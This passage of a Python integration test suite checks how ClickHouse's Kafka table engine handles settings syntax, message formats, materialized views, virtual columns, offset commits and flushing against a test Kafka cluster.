(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic':topic, 'partitions':partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
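# For reference, describe_consumer_group() returns a list shaped roughly like the
# following (the concrete values here are made up for illustration):
# [{'member_id': '...', 'client_id': 'ClickHouse-instance-test-kafka',
#   'client_host': '/172.16.0.3',
#   'assignment': [{'topic': 'old', 'partitions': [0]}]}]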
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
global kafka_id
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print("kafka_id is {}".format(kafka_id))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
wait_kafka_is_available()
# print("kafka is available - running test")
yield # run test
# Tests
@pytest.mark.timeout(180)
def test_kafka_settings_old_syntax(kafka_cluster):
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro", ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n');
''')
# Don't insert malformed messages, since the old settings syntax
# does not support skipping broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('old', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('old')
assert members[0]['client_id'] == u'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose")
@pytest.mark.timeout(180)
def test_kafka_settings_new_syntax(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
# Insert a couple of malformed messages.
kafka_produce('new', ['}{very_broken_message,'])
kafka_produce('new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('new', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
members = describe_consumer_group('new')
assert members[0]['client_id'] == u'instance test 1234'
@pytest.mark.timeout(180)
def test_kafka_issue11308(kafka_cluster):
# Check that the materialized view respects the Kafka table's SETTINGS
kafka_produce('issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }', '{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_issue4116(kafka_cluster):
# Check that the format_csv_delimiter parameter works now that all available format settings are passed through to the Kafka engine.
kafka_produce('issue4116', ['1|foo', '2|bar', '42|answer','100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(180)
def test_kafka_consumer_hang(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
time.sleep(10)
instance.query('SELECT * FROM test.view')
# This should trigger a heartbeat failure,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to a consumer hang.
kafka_cluster.pause_container('kafka1')
time.sleep(0.5)
kafka_cluster.unpause_container('kafka1')
# print("Attempt to drop")
instance.query('DROP TABLE test.kafka')
#kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# i.e. it kept waiting forever for the application to execute the queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_consumer_hang2(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# the first consumer subscribes to the topic, tries to poll some data, and goes to rest
instance.query('SELECT * FROM test.kafka')
# the second consumer does the same, leading to a rebalance in the first
# consumer; try to poll some data
instance.query('SELECT * FROM test.kafka2')
#echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
@pytest.mark.timeout(180)
def test_kafka_csv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce('csv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_tsv_with_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce('tsv', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_select_empty(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
@pytest.mark.timeout(180)
def test_kafka_json_without_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('json', [messages])
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_protobuf(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages('pb', 0, 20)
kafka_produce_protobuf_messages('pb', 20, 1)
kafka_produce_protobuf_messages('pb', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
@pytest.mark.timeout(180)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
@pytest.mark.timeout(300)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batches of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce('flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:9092")
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in offsets.items():
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages*batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages*batch_messages, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(180)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce('virt1', [messages], 0)
result = ''
while True:
result += instance.query('''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''', ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
@pytest.mark.timeout(180)
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce('virt2', messages, 0)
while True:
result = instance.query('SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view')
if kafka_check_result(result, False, 'test_kafka_virtual2.reference'):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
@pytest.mark.timeout(180)
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume('insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
@pytest.mark.timeout(240)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
@pytest.mark.timeout(300)
def test_kafka_commit_on_block_write(kafka_cluster):
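# Offsets should be committed after every written block: after the Kafka table is dropped and
# recreated below, the rows already materialized into test.view must not be consumed again.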
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce('block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
while int(instance.query("SELECT count() FROM system.tables WHERE database='test' AND name='kafka'")) == 1:
time.sleep(1)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
@pytest.mark.timeout(180)
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:9092")
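# the timestamp_ms values below correspond to 2020-01-01 00:00:01 .. 00:00:08 UTC
# (1577836800 is 2020-01-01 00:00:00 UTC), matching the expected _timestamp column output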
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001, headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002, headers=[('empty_value', ''),('', 'empty name'), ('',''), ('repetition', '1'), ('repetition', '2')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003, headers=[('b', 'b'),('a', 'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004, headers=[('a', 'a'),('b', 'b')])
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
time.sleep(1)
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
time.sleep(10)
members = describe_consumer_group('virt2')
#pprint.pprint(members)
members[0]['client_id'] = u'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = u'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(240)
def test_kafka_produce_key_timestamp(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1,1,'k1',1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2,2,'k2',1577836802))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3,3,'k3',1577836803,4,4,'k4',1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5,5,'k5',1577836805))
while int(instance.query("SELECT count() FROM test.view")) < 5:
time.sleep(1)
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# print(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
@pytest.mark.timeout(600)
def test_kafka_flush_by_time(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() > 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce('flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query("SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happen during the test; we need to check only the result of the first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# print(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
